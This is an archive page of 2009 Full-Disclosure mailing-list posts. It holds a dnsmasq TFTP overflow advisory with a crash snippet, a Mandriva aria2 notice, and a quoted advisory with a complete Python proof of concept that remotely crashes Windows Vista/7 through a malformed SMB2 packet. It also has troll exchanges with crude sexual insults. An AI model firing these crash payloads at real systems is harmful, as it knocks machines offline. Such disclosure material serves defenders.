-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.
On Tue, 08 Sep 2009 11:52:55 -, Central Security District of UK [MI7.5] said: I just go off the phone with intelligence Congrats. I call Poe's Law on this - it's reached the point where it's impossible to tell if it's really n3td3v under another alias, or a sufficiently well-done parody. :) pgponamWFjVaf.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
1. *Advisory Information*
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Advisory ID: CORE-2009-0820
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
Date published: 2009-08-31
Date of last update: 2009-08-31
Vendors contacted: Simon Kelley
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36120, 36121
CVE Name: CVE-2009-2957, CVE-2009-2958
3. *Vulnerability Description*
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
has been found that may allow an attacker to execute arbitrary code on
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
enabled ('--enable-tfp'). This service is not enabled by default on most
distributions; in particular it is not enabled by default on OpenWRT or
DD-WRT. Chances of successful exploitation increase when a long
directory prefix is used for TFTP. Code will be executed with the
privileges of the user running dnsmasq, which is normally a
non-privileged one.
Additionally there is a potential DoS attack to the TFTP service by
exploiting a null-pointer dereference vulnerability.
4. *Vulnerable packages*
. dnsmasq 2.40.
. dnsmasq 2.41.
. dnsmasq 2.42.
. dnsmasq 2.43.
. dnsmasq 2.44.
. dnsmasq 2.45.
. dnsmasq 2.46.
. dnsmasq 2.47.
. dnsmasq 2.48.
. dnsmasq 2.49.
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. dnsmasq 2.50
6. *Vendor Information, Solutions and Workarounds*
If the TFTP service is enabled and patching is not available
immediately, a valid workaround is to filter TFTP for untrusted hosts in
the network (such as the Internet). This is the default configuration
when enabling TFTP on most home routers.
Patches are already available from the software author. Most
distributions should release updates for binary packages soon.
7. *Credits*
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team Los
Herederos de Don Pablo of Core Security Technologies.
The null-pointer dereference (CVE-2009-2958) was reported to the author
of dnsmasq independently by an uncredited code auditor. It was merged
with this advisory for user's convenience.
8. *Technical Description*
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
First let's focus on the overflow vulnerability. The 'tftp_request'
calls 'strncat' on 'daemon-namebuff', which has a predefined size of
'MAXDNAME' bytes (defaulting to 1025).
/---
else if (filename[0] == '/')
daemon-namebuff[0] = 0;
strncat(daemon-namebuff, filename, MAXDNAME);
- ---/
This may cause a heap overflow because 'daemon-namebuff' may already
contain data, namely the configured 'daemon-tftp_prefix' passed to the
daemon via a configuration file.
/---
if (daemon-tftp_prefix)
{
if (daemon-tftp_prefix[0] == '/')
daemon-namebuff[0] = 0;
strncat(daemon-namebuff, daemon-tftp_prefix, MAXDNAME)
- ---/
The default prefix is '/var/tftpd', but if a longer prefix is used,
arbitrary code execution may be possible.
Sending the string resulting from the execution of the following python
snippet to a vulnerable server, with a long enough directory prefix
configured, should crash the daemon.
/---
import sys
sys.stdout.write( '\x00\x01' + A*1535 + '\x00' + netascii + '\x00' )
- ---/
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
Now onto the null-pointer dereference. The user can crash the service by
handcrafting a packet, because of a problem on the guard of the first if
inside this code loop:
/---
while ((opt = next(p, end)))
{
if (strcasecmp(opt, blksize) == 0
(opt = next(p, end))
!(daemon-options OPT_TFTP_NOBLOCK))
{
transfer-blocksize = atoi(opt);
if (transfer-blocksize 1)
transfer-blocksize = 1;
if (transfer-blocksize (unsigned)daemon-packet_buff_sz - 4)
transfer-blocksize = (unsigned)daemon-packet_buff_sz - 4;
transfer-opt_blocksize = 1;
transfer-block = 0;
}
if (strcasecmp(opt, tsize) == 0 next(p, end)
!transfer-netascii)
{
transfer-opt_transize = 1;
transfer-block = 0;
}
}
- ---/
The problem exists because the guard of the first if includes the result
of 'opt = next(p, end)' as part of the check. If this returns 'NULL',
the guard will fail and in the next if 'strcasecmp(opt, tsize)' will
derrefence the null-pointer.
9. *Report Timeline*
. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,
[Full-disclosure] [ MDVSA-2009:226 ] aria2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:226 http://www.mandriva.com/security/ ___ Package : aria2 Date: September 9, 2009 Affected: 2009.0, 2009.1, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in aria2: aria2 has a buffer overflow which makes it crashing at least on mips. This update provides a solution to this vulnerability. ___ References: https://qa.mandriva.com/52840 ___ Updated Packages: Mandriva Linux 2009.0: aca5d2cf89e66c2ce9571a92d4422fdd 2009.0/i586/aria2-0.15.3-0.20080918.3.1mdv2009.0.i586.rpm 426570e80bfb4500ddfb6b614ce00b1d 2009.0/SRPMS/aria2-0.15.3-0.20080918.3.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 3ffda03aa513f64aae44c753723b6057 2009.0/x86_64/aria2-0.15.3-0.20080918.3.1mdv2009.0.x86_64.rpm 426570e80bfb4500ddfb6b614ce00b1d 2009.0/SRPMS/aria2-0.15.3-0.20080918.3.1mdv2009.0.src.rpm Mandriva Linux 2009.1: ad69905c7c6705df5e6a45c74bffef2e 2009.1/i586/aria2-1.2.0-0.20090201.3.1mdv2009.1.i586.rpm 50e2057ebaac0901d19ca7feb8063e53 2009.1/SRPMS/aria2-1.2.0-0.20090201.3.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 4b5529526d974780f65a7036424b8aa5 2009.1/x86_64/aria2-1.2.0-0.20090201.3.1mdv2009.1.x86_64.rpm 50e2057ebaac0901d19ca7feb8063e53 2009.1/SRPMS/aria2-1.2.0-0.20090201.3.1mdv2009.1.src.rpm Mandriva Enterprise Server 5: 3d6e5be8530d12ffd36e9e643a4e4538 mes5/i586/aria2-0.15.3-0.20080918.3.1mdvmes5.i586.rpm 5ffa73ba78d44cf0c61dda3042e23d00 mes5/SRPMS/aria2-0.15.3-0.20080918.3.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: bc874285d1ded702bded3e04767e9aa6 mes5/x86_64/aria2-0.15.3-0.20080918.3.1mdvmes5.x86_64.rpm 5ffa73ba78d44cf0c61dda3042e23d00 mes5/SRPMS/aria2-0.15.3-0.20080918.3.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKp7sWmqjQ0CJFipgRAnWVAJ9NTr/fWkV54mK2oW+YPvIP9cL3ZwCcCDm9 LSL0lhYX2+XU0QijJNzojuo= =SGvN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.
valdis.kletni...@vt.edu wrote: On Tue, 08 Sep 2009 11:52:55 -, Central Security District of UK [MI7.5] said: I just go off the phone with intelligence Congrats. I call Poe's Law on this - it's reached the point where it's impossible to tell if it's really n3td3v under another alias, or a sufficiently well-done parody. :) Does anybody care? In fact does anybody who contributes anything useful to this list use Hushmail? (at this time I am too lazy to look). If not I can set my spam filter. Amusing as it has been, it has grown tiresome. btw mr lawyer/mr random guy etc. my dick is bigger than yours, at least that's what your wife and sister tell me ;-) I am a noob with skills marginally better (debatable) than the average spotty first line support analyst. Therefore constructive criticism is welcomed, anything else is ignored unless I am bored or stupid enough to read/repond these postings after a bottle of Shiraz. regards the learner aka MrX ps I wish I didn't have so much to learn. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hey, buddy, you know spam filters sometimes can be stupid. Don't implement a stupid filter in your head. Just because I mention a troll in my email, have a hushmail address, and post a link you assume I must be rickrolling you or something? I was really surprised when I heard that Gaffie's remote DoS could infact be remote code exec. Not a mention here, unless I missed something. That's the link I posted, and since I don't understand shit to asm, I was expecting some feedback. BTW, this is not a flame, but sice you assumed I was trolling, I just wanted to make clear I was providing info, and waiting for feedback on it. PS : I use hush as disposable addresses, and it's none of your business. And I don't mind my sister sleeping around, she's just a whore anyway. - -- Does anybody care? In fact does anybody who contributes anything useful to this list use Hushmail? (at this time I am too lazy to look). If not I can set my spam filter. Amusing as it has been, it has grown tiresome. btw mr lawyer/mr random guy etc. my dick is bigger than yours, at least that's what your wife and sister tell me ;-) I am a noob with skills marginally better (debatable) than the average spotty first line support analyst. Therefore constructive criticism is welcomed, anything else is ignored unless I am bored or stupid enough to read/repond these postings after a bottle of Shiraz. regards the learner aka MrX ps I wish I didn't have so much to learn. -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkqoBUAACgkQRVBSp0SbIgej/QP/TfHJGc1k9EsuyMWfEIzLlC1RO1p0 wn34XeBrO/TzHCgam2jhMGSitbtOtOOGjLKyF+gBXGLaFwFDXh/dZamHtrDFLQGdzX2/ u7N5rkOSeiAmUys2K5h1iMMcohUlBpaLvsB9XrqBe1Oq3MFHV+H5NYusZlw1gFXNk0y6 qBRkqZE= =ymH2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.
I basically got no friends left. Every last friend I have this local detective has pegged every last buddy I have. I'm stuck in my house with nobody to turn to.. If you ever had detectives contact all your friends over the past 2 years trying to get them to inform on you and set you up as a hacker or cyberbully... What would you do? 1.) Hire lawyer + private eye to disclose the identity of the detective ruining your life, possibly file a law suit? 2.) Move. 3.) What would you do? Please help. This guy is just shutting my life down. PS They got nothing on me. I've broke no law. I'll never be arrested because 1.) I did nothing 2.) I won't do anything, and haven't even when they sent informants to set me up. Their just bugging me because I know about computers. regards the learner aka MrX ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.
On Wednesday 09 September 2009 19:44:07 TheLearner wrote: [...snipped...] What would you do? Please help. This guy is just shutting my life down. regards the learner aka MrX do you obtain and use all of your content (music, movies, tvshows) fairly? if this guy really is a detective, find out who he is and what agency he is affiliated with (if any). after that you can decide what to do. regards, J -- Zoid Technologies: Custom Information Systems http://zoidtechnologies.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.
I would suggest you see a psychologist or psychiatrist to rule out paranoia/schizophrenia/etc. just to be on the safe side. On Wed, 09 Sep 2009 17:44:07 -0600 TheLearner mrxisapl...@hush.com wrote: I basically got no friends left. Every last friend I have this local detective has pegged every last buddy I have. I'm stuck in my house with nobody to turn to.. If you ever had detectives contact all your friends over the past 2 years trying to get them to inform on you and set you up as a hacker or cyberbully... What would you do? 1.) Hire lawyer + private eye to disclose the identity of the detective ruining your life, possibly file a law suit? 2.) Move. 3.) What would you do? Please help. This guy is just shutting my life down. PS They got nothing on me. I've broke no law. I'll never be arrested because 1.) I did nothing 2.) I won't do anything, and haven't even when they sent informants to set me up. Their just bugging me because I know about computers. regards the learner aka MrX ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.
On Wed, Sep 9, 2009 at 11:43 AM, mrx m...@propergander.org.uk wrote: Does anybody care? In fact does anybody who contributes anything useful to this list use Hushmail? (at this time I am too lazy to look). If not I can set my spam filter. Amusing as it has been, it has grown tiresome. Huh. Yeah, I don't know. I think I'll set a filter on hushmail. Oh, wait, then I wouldn't get all your other messages! On Wed, Sep 9, 2009 at 4:44 PM, TheLearner mrxisapl...@hush.com wrote: I basically got no friends left. Every last friend I have this local detective has pegged every last buddy I have. I'm stuck in my house with nobody to turn to.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
So Msoft! why can't they just stop reintroducing bugs?
On Wed, Sep 9, 2009 at 11:04 AM, random...@hushmail.com wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
How come all I hear about is n3td3v, and I see noone crying out
lout about this :
http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta
sk=showaction=viewid=64Itemid=15http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta%0Ask=showaction=viewid=64Itemid=15
is fd all 'bout trolls nao?
- --
=
- - Release date: September 7th, 2009
- - Discovered by: Laurent Gaffié
- - Severity: Medium/High
=
I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
- -
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0
for more details.
III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
to a SMB server, and it's used
to identify the SMB dialect that will be used for futher
communication.
IV. PROOF OF CONCEPT
- -
Smb-Bsod.py:
#!/usr/bin/python
# When SMB2.0 recieve a char in the Process Id High SMB
header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep
host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be
\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
- -
An attacker can remotly crash without no user interaction, any
Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Win Server 2008
as it use the same SMB2.0 driver (not tested).
VII. SOLUTION
- -
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.
VIII. REFERENCES
- -
http://microsoft.com
IX. CREDITS
- -
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/
X. LEGAL NOTICES
- -
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
http://www.jewelerslounge.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
